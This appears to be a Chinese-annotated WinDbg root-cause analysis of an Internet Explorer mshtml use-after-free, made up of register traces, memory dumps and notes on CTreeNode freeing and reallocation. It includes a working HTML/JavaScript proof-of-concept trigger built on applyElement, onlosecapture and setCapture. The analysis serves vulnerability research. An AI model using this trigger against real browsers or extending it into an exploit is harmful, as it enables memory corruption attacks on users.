1:021> g Breakpoint 4 hit eax=06c3efd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi=00001200 edi=00000000 eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216 mshtml!CElement::appendChild: 6a1f20c4 8bff mov edi,edi 1:021> g Breakpoint 5 hit eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8 eip=6a2bced0 esp=0425e594 ebp=0425e630 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode: 6a2bced0 8bff mov edi,edi 1:021> p eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8 eip=6a2bced2 esp=0425e594 ebp=0425e630 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x2: 6a2bced2 55 push ebp 1:021> eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8 eip=6a2bced3 esp=0425e590 ebp=0425e630 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x3: 6a2bced3 8bec mov ebp,esp 1:021> eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8 eip=6a2bced5 esp=0425e590 ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x5: 6a2bced5 8a450c mov al,byte ptr [ebp+0Ch] ss:0023:0425e59c=00 1:021> eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8 eip=6a2bced8 esp=0425e590 ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x8: 6a2bced8 c0e004 shl al,4 1:021> eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8 eip=6a2bcedb esp=0425e590 ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0xb: 6a2bcedb 324109 xor al,byte ptr [ecx+9] ds:0023:196e2fb9=00 1:021> eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8 eip=6a2bcede esp=0425e590 ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0xe: 6a2bcede 56 push esi 1:021> eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=0425e660 edi=07824fc8 eip=6a2bcedf esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0xf: 6a2bcedf 8b7140 mov esi,dword ptr [ecx+40h] ds:0023:196e2ff0=00000000 1:021> eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8 eip=6a2bcee2 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x12: 6a2bcee2 2410 and al,10h 1:021> eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8 eip=6a2bcee4 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x14: 6a2bcee4 304109 xor byte ptr [ecx+9],al ds:0023:196e2fb9=00 1:021> eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8 eip=6a2bcee7 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x17: 6a2bcee7 8a5109 mov dl,byte ptr [ecx+9] ds:0023:196e2fb9=00 1:021> eax=196e2f00 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8 eip=6a2bceea esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x1a: 6a2bceea b8ffffffff mov eax,0FFFFFFFFh 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8 eip=6a2bceef esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x1f: 6a2bceef 6689410a mov word ptr [ecx+0Ah],ax ds:0023:196e2fba=0000 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8 eip=6a2bcef3 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x23: 6a2bcef3 0bc0 or eax,eax 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8 eip=6a2bcef5 esp=0425e58c ebp=0425e590 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 mshtml!CTreeNode::CTreeNode+0x25: 6a2bcef5 83e607 and esi,7 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000000 edi=07824fc8 eip=6a2bcef8 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x28: 6a2bcef8 83ce08 or esi,8 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcefb esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x2b: 6a2bcefb 6689410c mov word ptr [ecx+0Ch],ax ds:0023:196e2fbc=0000 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bceff esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x2f: 6a2bceff 83c8ff or eax,0FFFFFFFFh 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf02 esp=0425e58c ebp=0425e590 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 mshtml!CTreeNode::CTreeNode+0x32: 6a2bcf02 897140 mov dword ptr [ecx+40h],esi ds:0023:196e2ff0=00000000 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf05 esp=0425e58c ebp=0425e590 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 mshtml!CTreeNode::CTreeNode+0x35: 6a2bcf05 6689410e mov word ptr [ecx+0Eh],ax ds:0023:196e2fbe=0000 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf09 esp=0425e58c ebp=0425e590 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 mshtml!CTreeNode::CTreeNode+0x39: 6a2bcf09 8939 mov dword ptr [ecx],edi ds:0023:196e2fb0=00000000 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf0b esp=0425e58c ebp=0425e590 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286 mshtml!CTreeNode::CTreeNode+0x3b: 6a2bcf0b 85ff test edi,edi 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf0d esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x3d: 6a2bcf0d 7406 je mshtml!CTreeNode::CTreeNode+0x45 (6a2bcf15) [br=0] 1:021> eax=ffffffff ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf0f esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x3f: 6a2bcf0f 8a4718 mov al,byte ptr [edi+18h] ds:0023:07824fe0=75 1:021> eax=ffffff75 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf12 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x42: 6a2bcf12 884108 mov byte ptr [ecx+8],al ds:0023:196e2fb8=00 1:021> eax=ffffff75 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf15 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x45: 6a2bcf15 8b4508 mov eax,dword ptr [ebp+8] ss:0023:0425e598=15171fb0 1:021> eax=15171fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf18 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x48: 6a2bcf18 894104 mov dword ptr [ecx+4],eax ds:0023:196e2fb4=00000000 1:021> eax=15171fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf1b esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x4b: 6a2bcf1b 85ff test edi,edi 1:021> eax=15171fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf1d esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x4d: 6a2bcf1d 0f84f15deaff je mshtml!CTreeNode::CTreeNode+0x5a (6a162d14) [br=0] 1:021> eax=15171fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf23 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x4f: 6a2bcf23 0fb64108 movzx eax,byte ptr [ecx+8] ds:0023:196e2fb8=75 1:021> eax=00000075 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf27 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x53: 6a2bcf27 e8cd020000 call mshtml!IsPreLikeTag (6a2bd1f9) 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf2c esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x5c: 6a2bcf2c 85c0 test eax,eax 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf2e esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x5e: 6a2bcf2e 0f95c0 setne al 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf31 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x61: 6a2bcf31 c0e003 shl al,3 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf34 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x64: 6a2bcf34 32c2 xor al,dl 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf36 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x66: 6a2bcf36 2408 and al,8 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf38 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x68: 6a2bcf38 32c2 xor al,dl 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf3a esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x6a: 6a2bcf3a 884109 mov byte ptr [ecx+9],al ds:0023:196e2fb9=00 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf3d esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x6d: 6a2bcf3d 85ff test edi,edi 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf3f esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x6f: 6a2bcf3f 0f84d65deaff je mshtml!CTreeNode::CTreeNode+0x7c (6a162d1b) [br=0] 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf45 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x71: 6a2bcf45 0fb64108 movzx eax,byte ptr [ecx+8] ds:0023:196e2fb8=75 1:021> eax=00000075 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf49 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x75: 6a2bcf49 e8ab020000 call mshtml!IsPreLikeTag (6a2bd1f9) 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf4e esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x7e: 6a2bcf4e 33d2 xor edx,edx 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf50 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x80: 6a2bcf50 85c0 test eax,eax 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf52 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x82: 6a2bcf52 0f95c2 setne dl 1:021> eax=00000000 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf55 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x85: 6a2bcf55 8bc1 mov eax,ecx 1:021> eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf57 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x87: 6a2bcf57 33d6 xor edx,esi 1:021> eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000008 esi=00000008 edi=07824fc8 eip=6a2bcf59 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x89: 6a2bcf59 83e201 and edx,1 1:021> eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000000 esi=00000008 edi=07824fc8 eip=6a2bcf5c esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::CTreeNode+0x8c: 6a2bcf5c 33d6 xor edx,esi 1:021> eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000008 esi=00000008 edi=07824fc8 eip=6a2bcf5e esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x8e: 6a2bcf5e 895140 mov dword ptr [ecx+40h],edx ds:0023:196e2ff0=00000008 1:021> eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000008 esi=00000008 edi=07824fc8 eip=6a2bcf61 esp=0425e58c ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x91: 6a2bcf61 5e pop esi 1:021> eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000008 esi=0425e660 edi=07824fc8 eip=6a2bcf62 esp=0425e590 ebp=0425e590 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x92: 6a2bcf62 5d pop ebp 1:021> eax=196e2fb0 ebx=00000000 ecx=196e2fb0 edx=00000008 esi=0425e660 edi=07824fc8 eip=6a2bcf63 esp=0425e594 ebp=0425e630 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x93: 6a2bcf63 c20800 ret 8 1:021> dd eax 196e2fb0 07824fc8 15171fb0 ffff0075 ffffffff 196e2fc0 00000000 00000000 00000000 00000000 196e2fd0 00000000 00000000 00000000 00000000 196e2fe0 00000000 00000000 00000000 00000000 196e2ff0 00000008 00000000 00000000 d0d0d0d0 196e3000 ???????? ???????? ???????? ???????? 196e3010 ???????? ???????? ???????? ???????? 196e3020 ???????? ???????? ???????? ???????? 1:021> dd 07824fc8 07824fc8 6a11c2e8 00000002 00000008 1506efe8 07824fd8 071faeb0 00000000 80000075 00010000 07824fe8 00000000 18b1cfe8 0e030ff4 00000000 07824ff8 00000000 00000000 ???????? ???????? 07825008 ???????? ???????? ???????? ???????? 07825018 ???????? ???????? ???????? ???????? 07825028 ???????? ???????? ???????? ???????? 07825038 ???????? ???????? ???????? ???????? 1:021> ln 6a11c2e8 (6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable' Exact matches: mshtml!CGenericElement::`vftable' = <no type information>
同理得document.body.appendChild(id_1);导致了CGenericElement对象的CTreeNode对象建立
<html> <script> function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); document.body.appendChild(id_0); document.body.appendChild(id_1); Math.tan(3,4); id_1.applyElement(id_0); Math.cos(3,4); id_0.onlosecapture=function(e) { document.write(""); } Math.sin(3,4); id_0['outerText']=""; Math.tan(3,4); id_0.setCapture(); Math.cos(3,4); id_1.setCapture(); Math.sin(3,4); } window.onload = function() { trigger(); } </script> </html>
修改POC重新下辅助调试语句
1:021> g Breakpoint 0 hit eax=00000000 ebx=0441e988 ecx=00000005 edx=00000003 esi=0441e978 edi=0441e978 eip=6c77d8c0 esp=0441e874 ebp=0441e8b0 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216 jscript!tan: 6c77d8c0 ff258010756c jmp dword ptr [jscript!_imp__tan (6c751080)] ds:0023:6c751080={msvcrt!tan (773dde34)}
重新下断点
1:021> bl 0 e 6c77d8c0 0001 (0001) 1:**** jscript!tan 1 e 6a2bced0 0001 (0001) 1:**** mshtml!CTreeNode::CTreeNode 2 e 6a2fe563 0001 (0001) 1:**** mshtml!CTreeNode::Release 3 e 6a23480f 0001 (0001) 1:**** mshtml!CElement::CElement 4 e 6a31071b 0001 (0001) 1:**** mshtml!CElement::~CElement 5 e 6a45673b 0001 (0001) 1:**** mshtml!CElement::applyElement
1:021> g Breakpoint 5 hit eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi=00001200 edi=00000000 eip=6a45673b esp=0441e7ec ebp=0441e820 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::applyElement: 6a45673b 8bff mov edi,edi
果然断了下来,看来mshtml就是使用的这个函数对应的js的applyElement
1:021> g Breakpoint 5 hit eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi=00001200 edi=00000000 eip=6a45673b esp=0441e7ec ebp=0441e820 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::applyElement: 6a45673b 8bff mov edi,edi 1:021> dd esp 0441e7ec 6a462da7 06e4efc8 07394fd8 052d5ff4 0441e7fc 0441e878 00810fd0 6a462cbe 6a2b2820 0441e80c 052d5ff4 07394fd8 00000002 00000000 0441e81c 00080009 0441e894 6a32235c 06e4efc8 0441e82c 00810fd0 06eaafd8 0000016c 6a2b2820 0441e83c 00000001 05498fe8 0441e870 00810fd0 0441e84c 00000000 80070005 01001002 77890023 0441e85c 0441ea68 0000016c 06eaafd8 00000000 1:021> dd 06e4efc8 06e4efc8 6a11c2e8 00000004 00000008 0738cfe8 06e4efd8 062c5ef0 07337fb0 00000075 00010200 06e4efe8 00000000 075c2f30 06e96ff4 00000000 06e4eff8 00000000 00000000 ???????? ???????? 06e4f008 ???????? ???????? ???????? ???????? 06e4f018 ???????? ???????? ???????? ???????? 06e4f028 ???????? ???????? ???????? ???????? 06e4f038 ???????? ???????? ???????? ???????? 1:021> ln 6a11c2e8 (6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable' Exact matches: mshtml!CGenericElement::`vftable' = <no type information> 1:021> dd 07394fd8 07394fd8 6a627f68 00000001 6a2d2fa8 06e42fd8 07394fe8 6a2aaadc 00000000 00000000 00020000 07394ff8 03000048 00000000 ???????? ???????? 07395008 ???????? ???????? ???????? ???????? 07395018 ???????? ???????? ???????? ???????? 07395028 ???????? ???????? ???????? ???????? 07395038 ???????? ???????? ???????? ???????? 07395048 ???????? ???????? ???????? ???????? 1:021> ln 6a627f68 (6a627f68) mshtml!s_apfnTrackerTearoffVtable | (6a6280a0) mshtml!s_fontFamilyMap Exact matches: mshtml!s_apfnTrackerTearoffVtable = <no type information>
第一个参数是CGenericElement对象指针,前面我们知道了id_1=CGenericElement
1:021> r eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi=00001200 edi=00000000 eip=6a45673b esp=0441e7ec ebp=0441e820 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::applyElement: 6a45673b 8bff mov edi,edi 1:021> g Breakpoint 2 hit eax=00000003 ebx=075c2f30 ecx=063f0754 edx=07392fb0 esi=07392fb0 edi=00000000 eip=6a2fe563 esp=0441e684 ebp=0441e738 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CTreeNode::Release: 6a2fe563 8b4a40 mov ecx,dword ptr [edx+40h] ds:0023:07392ff0=00000008 1:021> dd edx 07392fb0 06e42fd8 00000000 ffff0060 ffffffff 07392fc0 00000051 00000000 00000000 00000000 07392fd0 00000000 00000000 00000052 00000000 07392fe0 00000000 00000000 00000000 00000000 07392ff0 00000008 00000000 00000000 d0d0d0d0 07393000 ???????? ???????? ???????? ???????? 07393010 ???????? ???????? ???????? ???????? 07393020 ???????? ???????? ???????? ???????? 1:021> dd 06e42fd8 06e42fd8 6a0f70e0 00000002 00000008 00000000 06e42fe8 062c5f20 07392fb0 80000060 80010200 06e42ff8 00000002 075c2f30 ???????? ???????? 06e43008 ???????? ???????? ???????? ???????? 06e43018 ???????? ???????? ???????? ???????? 06e43028 ???????? ???????? ???????? ???????? 06e43038 ???????? ???????? ???????? ???????? 06e43048 ???????? ???????? ???????? ???????? 1:021> ln 6a0f70e0 (6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable' Exact matches: mshtml!CPhraseElement::`vftable' = <no type information>
注意,Math.cos(3,4);没有被命中。说明id_1.applyElement(id_0);导致了CPhraseElement(id_0)的CTreeNode释放
1:021> eax=06ab8fb0 ebx=00000000 ecx=06ab8fb0 edx=00000008 esi=00000008 edi=06e42fd8 eip=6a2bcf61 esp=0441e664 ebp=0441e668 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode+0x91: 6a2bcf61 5e pop esi 1:021> dd eax 06ab8fb0 06e42fd8 077a2fb0 ffff0060 ffffffff 06ab8fc0 00000000 00000000 00000000 00000000 06ab8fd0 00000000 00000000 00000000 00000000 06ab8fe0 00000000 00000000 00000000 00000000 06ab8ff0 00000008 00000000 00000000 d0d0d0d0 06ab9000 ???????? ???????? ???????? ???????? 06ab9010 ???????? ???????? ???????? ???????? 06ab9020 ???????? ???????? ???????? ???????? 1:021> dd 06e42fd8 06e42fd8 6a0f70e0 00000002 00000008 00000000 06e42fe8 062c5f20 00000000 80000060 80010000 06e42ff8 00000002 06ebefe8 ???????? ???????? 06e43008 ???????? ???????? ???????? ???????? 06e43018 ???????? ???????? ???????? ???????? 06e43028 ???????? ???????? ???????? ???????? 06e43038 ???????? ???????? ???????? ???????? 06e43048 ???????? ???????? ???????? ???????? 1:021> ln 6a0f70e0 (6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable' Exact matches: mshtml!CPhraseElement::`vftable' = <no type information>
然后又立即分配了这个对象
